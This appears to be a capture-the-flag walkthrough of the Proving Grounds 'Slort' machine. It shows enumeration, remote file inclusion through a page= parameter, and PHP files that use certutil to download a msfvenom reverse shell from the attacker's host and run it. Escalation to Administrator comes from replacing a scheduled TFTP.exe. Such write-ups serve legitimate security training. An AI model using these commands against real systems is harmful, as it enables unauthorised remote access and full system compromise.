Slort is available on Proving Grounds Practice, with a community rating of Intermediate. It also a great box to practice for the OSCP. As always we start with our nmap.
sudo nmap -sC -sV -p- 192.168.79.53
FTP is not accepting anonymous logins. A quick check for exploits for this version of FileZilla. Nothing appears relevant to us.
Let’s move onto SMB on port 445. Checking for null sessions. Nothing here either.
Moving to port 4443 and 8080. Both appear to be default screens for Apache.
Start GoBuster.
gobuster dir -u http://192.168.79.53:8080 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 -o gobuster.txtWe get some results straight away for /img and /site
When navigating the pages we note that only the last part of the url changes after “page=”. This might be vulnerable to Local File Inclusion. It is very easy for us to check. Simply start a Netcat listener on your Kali box.
Using curl, run the following command from Kali and monitor the results in your listener. You should see a hit.
curl http://192.168.79.53:4443/site/index.php?page=http://192.168.49.79/hi You can also append the details at the end of the URL if you wish. It achieves the same thing.
Success! This means we can create a reverse shell and get it onto the box.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.79 LPORT=4443 -f exe > reverse.exe We also need to create two .php files. We will name them “step1.php” and “step2.php”. In step 1, we include PHP code to reach back to our HTTP server and download our reverse shell, reverse.exe. In step 2, we include PHP code to run the .exe from the box.
step1.php
<?php
$exec = system('certutil.exe -urlcache -split -f "http://192.168.49.68/reverse.exe" shell.exe', $val);
?> step2.php
<?php
$exec = system('reverse.exe', $val);
?> Let’s start our HTTP server in the same location as where these PHP files are located. You will also need your .exe in the same place. Using curl, let’s ask the website to grab step1.php.
curl http://192.168.79.53:4443/site/index.php?page=http://192.168.49.79/step1.phpWe can see it grab the file step1.php from our HTTP server. We know it has run successfully because it then also gets the reverse.exe file we specified in the contents of the step1.php file.
Now we run curl again for step2.php, making sure our listener is running;
curl http://192.168.79.53:4443/site/index.php?page=http://192.168.49.79/step2.php
And we have our shell back;
Always a good chance to clarify the OS and version details exactly.
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 
Check for JuicyPotato vulnerability. Not on this box.
Navigating around the C:, we come across a folder called “backup”
Inside is a file called “info.txt”. The contents of this file outline that the file TFTP.exe runs every 5 minutes. Considering this is a backup procedure, it may be running as SYSTEM. Let’s take the current reverse shell binary that is on the victim, reverse.exe, and move it to the C:\Backup folder.
I rename the current TFTP.exe to TFTP_old.exe. I also rename our reverse.exe to TFTP.exe.
Kill our current shell. The reason being, we have not uploaded a new shell with a different port. So when our TFTP.exe shell tries to run again we can’t already be running something on port 4443. It might have been a better idea to create a new shell entirely with another port set in the LPORT section of msfvenom. I am lazy.
Restart our Netcat listener. After a few minutes, we get a new shell back. This time as Administrator.
For extract context, we can query the scheduled task which runs this binary. Drop into powershell.
schtasks /query /fo LIST /v | select-string 'TFTP' -context 10 
Slort was definitely a great box to practice common a very common exploitation method in Local File Inclusion. From them it was just a simple matter if allowing the Scheduled Task to do it’s thing and generate a new shell as SYSTEM.
